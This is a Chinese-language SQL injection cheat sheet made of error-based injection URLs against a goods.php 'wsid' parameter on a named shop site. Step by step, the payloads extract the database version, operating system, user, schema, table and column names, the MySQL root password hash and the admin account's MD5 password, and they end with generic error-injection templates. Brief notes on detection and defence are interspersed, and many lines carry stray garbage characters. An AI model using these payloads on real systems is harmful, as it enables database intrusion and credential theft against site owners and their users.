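判断版本号
（以下请求都是在 goods.php 的 wsid 参数后拼接 and (1,1)>(select count(*),concat(…,floor(rand()*2)) x … group by x) 形式的子查询；访问日志或 WAF 中出现 floor(rand(、group by x、information_schema 等特征可作为检测依据。）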
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%232 e3 e& V% r- w
判断系统
- d# t9 M3 g1 [8 ohttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 user()
8 ~6 N) M# ^$ V8 K$ @; o! D& mhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 p0 V O- n# X! o* M% v
当前 database()
% [/ p( p& a; _5 j' dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. s$ R& V# o4 w/ V0 B3 V' d* @
root hash（该查询读取 mysql.user 的 Password 列；若能返回结果，说明网站连接数据库的账号权限过高，应改用只授予业务库所需权限的账号）
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库表名
* P. y4 E1 T! g' E6 uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 G" t1 H: Y8 R3 r f# g
当前 数据库 user_name 字段
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password
# m6 ^( x2 X7 H4 ?: _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* ]* _5 k, b: U# I/ j
获得 admin passwd(md5)（后台口令若只以 MD5 存放，哈希一旦泄露很容易被还原；应改用加盐的慢哈希，如 bcrypt）
- R$ ?. H0 U1 o9 ~" h7 ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 @: V- M# C* |7 ?6 U6 W
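报错注射（原理：对 concat(子查询结果, floor(rand(0)*2)) 做 group by 并配合 count(*) 时，MySQL 会抛出 Duplicate entry 错误，子查询结果随错误信息回显到页面；防御上应对拼接进 SQL 的参数使用参数化查询，并且不向页面输出数据库错误信息）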
7 N9 B. Q' z8 L" W: }SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a), h }( g% s1 Q2 m% E8 l
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |